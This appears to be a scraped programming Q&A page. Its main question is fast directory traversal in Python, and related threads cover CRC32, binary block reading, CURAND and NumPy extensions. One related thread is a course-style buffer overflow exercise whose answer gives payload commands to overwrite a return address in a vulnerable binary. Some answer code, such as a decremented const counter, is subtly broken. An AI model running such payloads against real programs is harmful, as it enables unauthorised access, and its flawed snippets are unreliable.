Reasonably faster way to traverse a directory tree in Python? - python

Assuming that the given directory tree is of reasonable size: say an open source project like Twisted or Python, what is the fastest way to traverse and iterate over the absolute path of all files/directories inside that directory?
I want to do this from within Python. os.path.walk is slow. So I tried ls -lR and tree -fi. For a project with about 8337 files (including tmp, pyc, test, .svn files):
$ time tree -fi > /dev/null
real 0m0.170s
user 0m0.044s
sys 0m0.123s
$ time ls -lR > /dev/null
real 0m0.292s
user 0m0.138s
sys 0m0.152s
$ time find . > /dev/null
real 0m0.074s
user 0m0.017s
sys 0m0.056s
$
tree appears to be faster than ls -lR (though ls -R is faster than tree, but it does not give full paths). find is the fastest.
Can anyone think of a faster and/or better approach? On Windows, I may simply ship a 32-bit binary tree.exe or ls.exe if necessary.
Update 1: Added find
Update 2: Why do I want to do this? ... I am trying to make a smart replacement for cd, pushd, etc.. and wrapper commands for other commands relying on passing paths (less, more, cat, vim, tail). The program will use file traversal occasionally to do that (eg: typing "cd sr grai pat lxml" would automatically translate to "cd src/pypm/grail/patches/lxml"). I won't be satisfied if this cd replacement took, say, half a second to run. See http://github.com/srid/pf

Your approach in pf is going to be hopelessly slow, even if os.path.walk took no time at all. Doing a regex match containing 3 unbounded closures across all extant paths will kill you right there. Here is the code from Kernighan and Pike that I referenced, this is a proper algorithm for the task:
/* spname: return correctly spelled filename */
/*
* spname(oldname, newname) char *oldname, *newname;
* returns -1 if no reasonable match to oldname,
* 0 if exact match,
* 1 if corrected.
* stores corrected name in newname.
*/
#include <sys/types.h>
#include <sys/dir.h>
spname(oldname, newname)
char *oldname, *newname;
{
char *p, guess[DIRSIZ+1], best[DIRSIZ+1];
char *new = newname, *old = oldname;
for (;;) {
while (*old == '/') /* skip slashes */
*new++ = *old++;
*new = '\0';
if (*old == '\0') /* exact or corrected */
return strcmp(oldname,newname) != 0;
p = guess; /* copy next component into guess */
for ( ; *old != '/' && *old != '\0'; old++)
if (p < guess+DIRSIZ)
*p++ = *old;
*p = '\0';
if (mindist(newname, guess, best) >= 3)
return -1; /* hopeless */
for (p = best; *new = *p++; ) /* add to end */
new++; /* of newname */
}
}
mindist(dir, guess, best) /* search dir for guess */
char *dir, *guess, *best;
{
/* set best, return distance 0..3 */
int d, nd, fd;
struct {
ino_t ino;
char name[DIRSIZ+1]; /* 1 more than in dir.h */
} nbuf;
nbuf.name[DIRSIZ] = '\0'; /* +1 for terminal '\0' */
if (dir[0] == '\0') /* current directory */
dir = ".";
d = 3; /* minimum distance */
if ((fd=open(dir, 0)) == -1)
return d;
while (read(fd,(char *) &nbuf,sizeof(struct direct)) > 0)
if (nbuf.ino) {
nd = spdist(nbuf.name, guess);
if (nd <= d && nd != 3) {
strcpy(best, nbuf.name);
d = nd;
if (d == 0) /* exact match */
break;
}
}
close(fd);
return d;
}
/* spdist: return distance between two names */
/*
* very rough spelling metric:
* 0 if the strings are identical
* 1 if two chars are transposed
* 2 if one char wrong, added or deleted
* 3 otherwise
*/
#define EQ(s,t) (strcmp(s,t) == 0)
spdist(s, t)
char *s, *t;
{
while (*s++ == *t)
if (*t++ == '\0')
return 0; /* exact match */
if (*--s) {
if (*t) {
if (s[1] && t[1] && *s == t[1]
&& *t == s[1] && EQ(s+2, t+2))
return 1; /* transposition */
if (EQ(s+1, t+1))
return 2; /* 1 char mismatch */
}
if (EQ(s+1, t))
return 2; /* extra character */
}
if (*t && EQ(s, t+1))
return 2; /* missing character */
return 3;
}
Note: this code was written way before ANSI C, ISO C, or POSIX anything was even imagined when one read directory files raw. The approach of the code is far more useful than all the pointer slinging.

It would be hard to get much better than find in performance, but the question is how much faster and why do you need it to be so fast? You claim that os.path.walk is slow, indeed, it is ~3 times slower on my machine over a tree of 16k directories. But then again, we're talking about the difference between 0.68 seconds and 1.9 seconds for Python.
If setting a speed record is your goal, you can't beat hard coded C which is completely 75% system call bound and you can't make the OS go faster. That said, 25% of the Python time is spent in system calls. What is it that you want to do with the traversed paths?

One solution you have not mentioned is 'os.walk'. I'm not sure it'd be any faster than os.path.walk, but it's objectively better.
You have not said what you're going to do with the list of directories when you have it, so it's hard to give more specific suggestions.

Although I doubt you have multiple read heads, here's how you can traverse a few million files (we've done 10M+ in a few minutes).
https://github.com/hpc/purger/blob/master/src/treewalk/treewalk.c

Related

Incorrect CRC calculation in protocol. One is implemented using zlib and the other one is calculated in function

I am implementing a protocol in an STM32F412 board. It's almost done, I just need to do a CRC check for the received data.
I tried using the internal CRC module for calculating the CRC but I could not match the result to any online CRC algorithm online, so I decided to do a simple implementation of the Ethernet CRC.
static const uint32_t crc32_tab[] =
{
0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L,
0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L,
0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L,
0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL,
0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L,
0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L,
0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L,
0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL,
0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L,
0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL,
0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L,
0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L,
0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L,
0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL,
0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL,
0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L,
0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL,
0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L,
0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L,
0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L,
0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL,
0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L,
0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L,
0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL,
0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L,
0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L,
0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L,
0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L,
0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L,
0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL,
0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL,
0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L,
0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L,
0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL,
0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL,
0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L,
0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL,
0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L,
0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL,
0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L,
0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL,
0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L,
0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L,
0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL,
0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L,
0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L,
0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L,
0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L,
0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L,
0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L,
0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL,
0x2d02ef8dL
};
uint32_t calc_crc_calculate(uint8_t *pData, uint32_t uLen)
{
uint32_t val = 0xFFFFFFFFU;
int i;
for(i = 0; i < uLen; i++) {
val = crc32_tab[(val ^ pData[i]) & 0xFF] ^ ((val >> 8) & 0x00FFFFFF);
}
return val^0xFFFFFFFF;
}
I calculated the crc of 0x6F and compared the result to the online calculators and it apparently matches.
When I try to test the protocol with my python code I'm just unable to match the CRCs. On python I'm using the following code:
d = 0x6f
crc = zlib.crc32(bytes(d))&0xFFFFFFFF
I'm now unable to tell which is right. Apparently my algorithm is OK because it matches the online calculator. BUT those online calculators do not seem to be reliable sometimes and I doubt that python's zlib implementation is wrong .. I may be using it wrong at worst.
Actually you can compute the Ethernet CRC32 with the builtin module of the STM32. It took me quite a while to make it match up as well.
This code should match up for sizes divisible by 4 (I also used python zlib on the other end):
#include "stm32l4xx_hal.h"
uint32_t CRC32_Compute(const uint32_t *data, size_t sizeIn32BitWords)
{
CRC_HandleTypeDef hcrc = {
.Instance = CRC,
.Init.DefaultPolynomialUse = DEFAULT_POLYNOMIAL_ENABLE,
.Init.DefaultInitValueUse = DEFAULT_INIT_VALUE_ENABLE,
.Init.InputDataInversionMode = CRC_INPUTDATA_INVERSION_WORD,
.Init.OutputDataInversionMode = CRC_OUTPUTDATA_INVERSION_ENABLE,
.InputDataFormat = CRC_INPUTDATA_FORMAT_WORDS,
};
HAL_StatusTypeDef status = HAL_CRC_Init(&hcrc);
assert (status == HAL_OK)
uint32_t checksum = HAL_CRC_Calculate(&hcrc, data, sizeIn32BitWords);
uint32_t checksumInverted = ~checksum;
return checksumInverted;
}
The challenge with sizes not divisible by 4 is to get the "inversion/reversal" (changing the bit order) right. There is an example how the hardware handles this in the "RM0394 Reference manual STM32L43xxx STM32L44xxx STM32L45xxx STM32L46xxx advanced ARM®-based 32-bit MCUs Rev 3" on page 333.
The essence is that reversal reverses the bit order. For CRC32 this reversal must happen on the word level, i.e. over 32 bits.
Ok. It certainly was a bug on my part. But it was happening in my python code.
I suddenly realized that I was practically doing bytes(0x6F) which just creates an array with 111 positions.
What I actually needed to do was
import struct
d = pack('B', 0x6F)
crc = zlib.crc32(bytes(d))&0xFFFFFFFF
This question could have been avoided had I just done a little bit of rubber duck debugging. Hopefuly this will help someone else.

How to divide a binary file to 6-byte blocks in C++ or Python with fast speed? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 3 years ago.
Improve this question
I’m reading a file in C++ and Python as a binary file. I need to divide the binary into blocks, each 6 bytes. For example, if my file is 600 bytes, the result should be 100 blocks, each 6 bytes.
I have tried struct (in C++ and Python) and array (Python). None of them divide the binary into blocks of 6 bytes. They can only divide the binary into blocks each power of two (1, 2, 4, 8, 16, etc.).
The array algorithm was very fast, reading 1 GB of binary data in less than a second as blocks of 4 bytes. In contrast, I used some other methods, but all of them are extremely slow, taking tens of minutes to do it for a few megabytes.
How can I read the binary as blocks of 6 bytes as fast as possible? Any help in either C++ or Python will be great. Thank you.
EDIT - The Code:
struct Block
{
char data[6];
};
class BinaryData
{
private:
char data[6];
public:
BinaryData() {};
~BinaryData() {};
void readBinaryFile(string strFile)
{
Block block;
ifstream binaryFile;
int size = 0;
binaryFile.open(strFile, ios::out | ios::binary);
binaryFile.seekg(0, ios::end);
size = (int)binaryFile.tellg();
binaryFile.seekg(0, ios::beg);
cout << size << endl;
while ( (int)binaryFile.tellg() < size )
{
cout << binaryFile.tellg() << " , " << size << " , " <<
size - (int)binaryFile.tellg() << endl;
binaryFile.read((char*)block.data,sizeof(block.data));
cout << block.data << endl;
//cin >> block.data;
if (size - (int)binaryFile.tellg() > size)
{
break;
}
}
binaryFile.close();
}
};
Notes :
in the file the numbers are in big endian ( remark )
the goal is to as fast as possible read them then sort them in ascending order ( remark )
Let's start simple, then optimize.
Simple Loop
uint8_t array1[6];
while (my_file.read((char *) &array1[0], 6))
{
Process_Block(&array1[0]);
}
The above code reads in a file, 6 bytes at a time and sends the block to a function.
Meets the requirements, not very optimal.
Reading Larger Blocks
Files are streaming devices. They have an overhead to start streaming, but are very efficient to keep streaming. In other words, we want to read as much data per transaction to reduce the overhead.
static const unsigned int CAPACITY = 6 * 1024;
uint8_t block1[CAPACITY];
while (my_file.read((char *) &block1[0], CAPACITY))
{
const size_t bytes_read = my_file.gcount();
const size_t blocks_read = bytes_read / 6;
uint8_t const * block_pointer = &block1[0];
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
}
The above code reads up to 1024 blocks in one transaction. After reading, each block is sent to a function for processing.
This version is more efficient than the Simple Loop, as it reads more data per transaction. Adjust the CAPACITY to find the optimal size on your platform.
Loop Unrolling
The previous code reduces the first bottleneck of input transfer speed (although there is still room for optimization). Another technique is to reduce the overhead of the processing loop by performing more data processing inside the loop. This is called loop unrolling.
const size_t bytes_read = my_file.gcount();
const size_t blocks_read = bytes_read / 6;
uint8_t const * block_pointer = &block1[0];
while ((blocks_read / 4) != 0)
{
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
Process_Block(block_pointer);
block_pointer += 6;
blocks_read -= 4;
}
while (blocks_read > 0)
{
Process_Block(block_pointer);
block_pointer += 6;
--blocks_read;
}
You can adjust the quantity of operations in the loop, to see how it affects your program's speed.
Multi-Threading & Multiple Buffers
Another two techniques for speeding up the reading of the data, are to use multiple threads and multiple buffers.
One thread, an input thread, reads the file into a buffer. After reading into the first buffer, the thread sets a semaphore indicating there is data to process. The input thread reads into the next buffer. This repeats until the data is all read. (For a challenge, figure out how to reuse the buffers and notify the other thread of which buffers are available).
The second thread is the processing thread. This processing thread is started first and waits for the first buffer to be completely read. After the buffer has the data, the processing thread starts processing the data. After the first buffer has been processed, the processing thread starts on the next buffer. This repeats until all the buffers have been processed.
The goal here is to use as many buffers as necessary to keep the processing thread running and not waiting.
Edit 1: Other techniques
Memory Mapped Files
Some operating systems support memory mapped files. The OS reads a portion of the file into memory. When a location outside the memory is accessed, the OS loads another portion into memory. Whether this technique improves performance needs to be measured (profiled).
Parallel Processing & Threading
Adding multiple threads may show negligible performance gain. Computers have a data bus (data highway) connecting many hardware devices, including memory, file I/O and the processor. Devices will be paused to let other devices use the data highway. With multiple cores or processors, one processor may have to wait while the other processor is using the data highway. This waiting may cause negligible performance gain when using multiple threads or parallel processing. Also, the operating system has overhead when constructing and maintaining threads.
Try that, the input file is received in argument of the program, as you said I suppose the the 6 bytes values in the file are written in the big endian order, but I do not make assumption for the program reading the file then sorting and it can be executed on both little and big endian (I check the case at the execution)
#include <iostream>
#include <fstream>
#include <vector>
#include <cstdint>
#include <algorithm>
#include <limits.h> // CHAR_BIT
using namespace std;
#if CHAR_BIT != 8
# error that code supposes a char has 8 bits
#endif
int main(int argc, char ** argv)
{
if (argc != 2)
cerr << "Usage: " << argv[1] << " <file>" << endl;
else {
ifstream in(argv[1], ios::binary);
if (!in.is_open())
cerr << "Cannot open " << argv[1] << endl;
else {
in.seekg(0, ios::end);
size_t n = (size_t) in.tellg() / 6;
vector<uint64_t> values(n);
uint64_t * p = values.data(); // for performance
uint64_t * psup = p + n;
in.seekg(0, ios::beg);
int i = 1;
if (*((char *) &i)) {
// little endian
unsigned char s[6];
uint64_t v = 0;
while (p != psup) {
if (!in.read((char *) s, 6))
return -1;
((char *) &v)[0] = s[5];
((char *) &v)[1] = s[4];
((char *) &v)[2] = s[3];
((char *) &v)[3] = s[2];
((char *) &v)[4] = s[1];
((char *) &v)[5] = s[0];
*p++ = v;
}
}
else {
// big endian
uint64_t v = 0;
while (p != psup) {
if (!in.read(((char *) &v) + 2, 6))
return -1;
*p++ = v;
}
}
cout << "file successfully read" << endl;
sort(values.begin(), values.end());
cout << "values sort" << endl;
// DEBUG, DO ON A SMALL FILE ;-)
for (auto v : values)
cout << v << endl;
}
}
}

Buffer overflow attack, executing an uncalled function

So, I'm trying to exploit this program that has a buffer overflow vulnerability to get/return a secret behind a locked .txt (read_secret()).
vulnerable.c //no edits here
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
void read_secret() {
FILE *fptr = fopen("/task2/secret.txt", "r");
char secret[1024];
fscanf(fptr, "%512s", secret);
printf("Well done!\nThere you go, a wee reward: %s\n", secret);
exit(0);
}
int fib(int n)
{
if ( n == 0 )
return 0;
else if ( n == 1 )
return 1;
else
return ( fib(n-1) + fib(n-2) );
}
void vuln(char *name)
{
int n = 20;
char buf[1024];
int f[n];
int i;
for (i=0; i<n; i++) {
f[i] = fib(i);
}
strcpy(buf, name);
printf("Welcome %s!\n", buf);
for (i=0; i<20; i++) {
printf("By the way, the %dth Fibonacci number might be %d\n", i, f[i]);
}
}
int main(int argc, char *argv[])
{
if (argc < 2) {
printf("Tell me your names, tricksy hobbitses!\n");
return 0;
}
// printf("main function at %p\n", main);
// printf("read_secret function at %p\n", read_secret);
vuln(argv[1]);
return 0;
}
attack.c //to be edited
#!/usr/bin/env bash
/task2/vuln "$(python -c "print 'a' * 1026")"
I know I can cause a segfault if I print large enough string, but that doesn't get me anywhere. I'm trying to get the program to execute read_secret by overwriting the return address on the stack, and returns to the read_secret function, instead of back to main.
But I'm pretty stuck here. I know I would have to use GDB to get the address of the read_secret function, but I'm kinda confused. I know that I would have to replace the main() address with the read_secret function's address, but I'm not sure how.
Thanks
If you want to execute a function through a buffer overflow vulnerability you have to first identify the offset at which you can get a segfault. In your case I assume its 1026. The whole game is to overwrite the eip(what tells the program what to do next) and then add your own instruction.
To add your own instruction you need to know the address of said instruction and then so in gdb open your program and then type in:
x function name
Then copy the address. You then have to convert it to big or little endian format. I do it with the struct module in python.
import struct
struct.pack("<I", address) # for little endian for big endian its different
Then you have to add it to your input to the binary so something like:
python -c "print 'a' * 1026 + 'the_address'" | /task2/vuln
#on bash shell, not in script
If all of this doesnt work then just add a few more characters to your offset. There might be something you didnt see coming.
python -c "print 'a' * 1034 + 'the_address'" | /task2/vuln
Hope that answers your question.

How to save and restore the state of a random number generator with CUDA CURAND?

I am using a large CUDA-matrix library developed within our organization. I need to save the state of a CUDA RNG to take a snapshop of a long-running simulation, and be able to restore it later. This is simple with, e.g., python+numpy:
state = numpy.random.get_state()
# state is a tuple with 5 fields which can be pickled, etc.
...
numpy.random.set_state(state)
I cannot seem to find equivalent functionality in the CUDA host api. You can set the seed and offset, but there is no way to retrieve it to save. The device API seems to offer something like this, but this library uses the host api, and it would be monsterous to change.
The hack-ey solution I am thinking about is to keep track of the number of calls to the RNG (reset when a seed is set), and simply call a RNG function repeatedly. However, I am not sure if the function parameters must be identical, e.g. matrix shapes, etc., to get it to the same state. Similarly, if the number of calls was equivalent to the offset parameter for initializing the RNG, this would work as well, i.e., if I call the RNG 200 times, I could set the offset to 200. However, in python, the offset in the state can increase by more than 1 with each call, so this is also potentially wrong.
Any insights into how to tackle this are appreciated!
For the CURAND Host API, I believe curandSetGeneratorOffset() can probably work for this.
Here's a modified example from the curand host API documentation:
$ cat t721.cu
/*
* This program uses the host CURAND API to generate 10
* pseudorandom floats. And then regenerate those same floats.
*/
#include <stdio.h>
#include <stdlib.h>
#include <cuda.h>
#include <curand.h>
#define CUDA_CALL(x) do { if((x)!=cudaSuccess) { \
printf("Error at %s:%d\n",__FILE__,__LINE__);\
return EXIT_FAILURE;}} while(0)
#define CURAND_CALL(x) do { if((x)!=CURAND_STATUS_SUCCESS) { \
printf("Error at %s:%d\n",__FILE__,__LINE__);\
return EXIT_FAILURE;}} while(0)
int main(int argc, char *argv[])
{
size_t n = 10;
size_t i;
curandGenerator_t gen;
float *devData, *hostData;
/* Allocate n floats on host */
hostData = (float *)calloc(n, sizeof(float));
/* Allocate n floats on device */
CUDA_CALL(cudaMalloc((void **)&devData, n*sizeof(float)));
/* Create pseudo-random number generator */
CURAND_CALL(curandCreateGenerator(&gen,
CURAND_RNG_PSEUDO_DEFAULT));
/* Set seed */
CURAND_CALL(curandSetPseudoRandomGeneratorSeed(gen,
1234ULL));
// generator offset = 0
/* Generate n floats on device */
CURAND_CALL(curandGenerateUniform(gen, devData, n));
// generator offset = n
/* Generate n floats on device */
CURAND_CALL(curandGenerateUniform(gen, devData, n));
// generator offset = 2n
/* Copy device memory to host */
CUDA_CALL(cudaMemcpy(hostData, devData, n * sizeof(float),
cudaMemcpyDeviceToHost));
/* Show result */
for(i = 0; i < n; i++) {
printf("%1.4f ", hostData[i]);
}
printf("\n\n");
CURAND_CALL(curandSetGeneratorOffset(gen, n));
// generator offset = n
CURAND_CALL(curandGenerateUniform(gen, devData, n));
// generator offset = 2n
/* Copy device memory to host */
CUDA_CALL(cudaMemcpy(hostData, devData, n * sizeof(float),
cudaMemcpyDeviceToHost));
/* Show result */
for(i = 0; i < n; i++) {
printf("%1.4f ", hostData[i]);
}
printf("\n");
/* Cleanup */
CURAND_CALL(curandDestroyGenerator(gen));
CUDA_CALL(cudaFree(devData));
free(hostData);
return EXIT_SUCCESS;
}
$ nvcc -o t721 t721.cu -lcurand
$ ./t721
0.7816 0.2338 0.6791 0.2824 0.6299 0.1212 0.4333 0.3831 0.5136 0.2987
0.7816 0.2338 0.6791 0.2824 0.6299 0.1212 0.4333 0.3831 0.5136 0.2987
$
So you'll need to keep track of the quantity of random numbers generated (not the number of RNG function calls) up to the point when you do your checkpoint, and save that.
When you restart, initialize the generator in the same way:
/* Create pseudo-random number generator */
CURAND_CALL(curandCreateGenerator(&gen,
CURAND_RNG_PSEUDO_DEFAULT));
/* Set seed */
CURAND_CALL(curandSetPseudoRandomGeneratorSeed(gen,
1234ULL));
but then advance by the number of previously generated values (n):
CURAND_CALL(curandSetGeneratorOffset(gen, n));
So, it is possible to store and restore the state by tracking the number of 32-bit values generated using curandSetGeneratorOffset. The algorithm looks something like:
template<typename T> RNG(T* X, size_T N /*number of values*/){
...
if (sizeof(T) == 1)
offset += (N+4-1)/4;
else if (sizeof(T) == 2)
offset += (N+2-1)/4;
else if (sizeof(T) == 4 || USING_GENERATE_UNIFORM_DOUBLE)
offset += N;
else if (sizeof(T) == 8)
offset += 2*N;
}
For 8-bit values, advance the offset by the N * next highest multiple of 4, for N values generated. For 16, advance by N * the next multiple of 2. For 32 advance by the N, and for 64 advance by 2*N.
HOWEVER, if you use GenerateUniformDouble, you only need to advance by N, not 2*N. I'm not sure why.
Thanks for the help!

Memory leak in Python extension when array is created with PyArray_SimpleNewFromData() and returned

I wrote a simple Python extension module to simulate a 3-bit analog-to-digital converter. It is supposed to accept a floating-point array as its input to return the same size array of output. The output actually consists of quantized input numbers. Here is my (simplified) module:
static PyObject *adc3(PyObject *self, PyObject *args) {
PyArrayObject *inArray = NULL, *outArray = NULL;
double *pinp = NULL, *pout = NULL;
npy_intp nelem;
int dims[1], i, j;
/* Get arguments: */
if (!PyArg_ParseTuple(args, "O:adc3", &inArray))
return NULL;
nelem = PyArray_DIM(inArray,0); /* size of the input array */
pout = (double *) malloc(nelem*sizeof(double));
pinp = (double *) PyArray_DATA(inArray);
/* ADC action */
for (i = 0; i < nelem; i++) {
if (pinp[i] >= -0.5) {
if (pinp[i] < 0.5) pout[i] = 0;
else if (pinp[i] < 1.5) pout[i] = 1;
else if (pinp[i] < 2.5) pout[i] = 2;
else if (pinp[i] < 3.5) pout[i] = 3;
else pout[i] = 4;
}
else {
if (pinp[i] >= -1.5) pout[i] = -1;
else if (pinp[i] >= -2.5) pout[i] = -2;
else if (pinp[i] >= -3.5) pout[i] = -3;
else pout[i] = -4;
}
}
dims[0] = nelem;
outArray = (PyArrayObject *)
PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
//Py_INCREF(outArray);
return PyArray_Return(outArray);
}
/* ==== methods table ====================== */
static PyMethodDef mwa_methods[] = {
{"adc", adc, METH_VARARGS, "n-bit Analog-to-Digital Converter (ADC)"},
{NULL, NULL, 0, NULL}
};
/* ==== Initialize ====================== */
PyMODINIT_FUNC initmwa() {
Py_InitModule("mwa", mwa_methods);
import_array(); // for NumPy
}
I expected that if reference counts were processed correctly, the Python garbage collection would (frequently enough) release the memory used by the output array if it has the same name and is used repeatedly. So I tested it on some dummy (but voluminous) data with this code:
for i in xrange(200):
a = rand(1000000)
b = mwa.adc3(a)
print i
Here the array named "b" is reused many times and its memory, borrowed by adc3() from the heap, is expected to be returned to the system. I used the gnome-system-monitor to check. Contrary to my expectations, the memory owned by python grew rapidly and could only be released by quitting the program (I use IPython).
For comparison, I tried the same procedure with the standard NumPy functions, zeros() and copy():
for i in xrange(1000):
a = np.zeros(10000000)
b = np.copy(a)
print i
As you can see, the latter code does not make any memory build-up.
I read many texts in the standard documentation and on the web, tried to use Py_INCREF(outArray) and not to use it. All in vain: the problem persisted.
However, I found the solution in http://wiki.scipy.org/Cookbook/C_Extensions/NumPy_arrays.
The author provides an extension program matsq() that creates an array and returns it. When I tried to use the calls suggested by the author:
outArray = (PyArrayObject *) PyArray_FromDims(nd,dims,NPY_DOUBLE);
pout = (double *) outArray->data;
instead of my
pout = (double *) malloc(nelem*sizeof(double));
outArray = (PyArrayObject *)
PyArray_SimpleNewFromData(1, dims, NPY_DOUBLE, pout);
/* no matter with or without Py_INCREF(outArray)) */
the memory leak gone! The program works properly now.
A question: can anybody explain why PyArray_SimpleNewFromData() does not provide the correct reference counting, while PyArray_FromDims() does?
Thank you very much.
ADDITION. I probably exceeded the room/time in comments, so I add to my comment to Alex here.
I tried to set the OWNDATA flag this way:
outArray->flags |= OWNDATA;
but I got "error: ‘OWNDATA’ undeclared".
The rest is in the comment. Thank you in advance.
SOLVED: The correct setting of the flag is
outArray->flags |= NPY_ARRAY_OWNDATA;
Now it works.
Alex, sorry.
The problem is not with PyArray_SimpleNewFromData which produces a properly refcounted PyObject*. Rather, it's with your malloc, assigned to pout then never freed.
As the docs at http://docs.scipy.org/doc/numpy/user/c-info.how-to-extend.html clearly state, documenting PyArray_SimpleNewFromData:
the ndarray will not own its data. When this ndarray is
deallocated, the pointer will not be freed.
...
If you want the
memory to be freed as soon as the ndarray is deallocated then simply
set the OWNDATA flag on the returned ndarray.
(my emphasis on the not). IOW, you're observing exactly the "will not be freed" behavior so clearly documented, and are not taking the step specifically recommended should you want to avoid said behavior.

Categories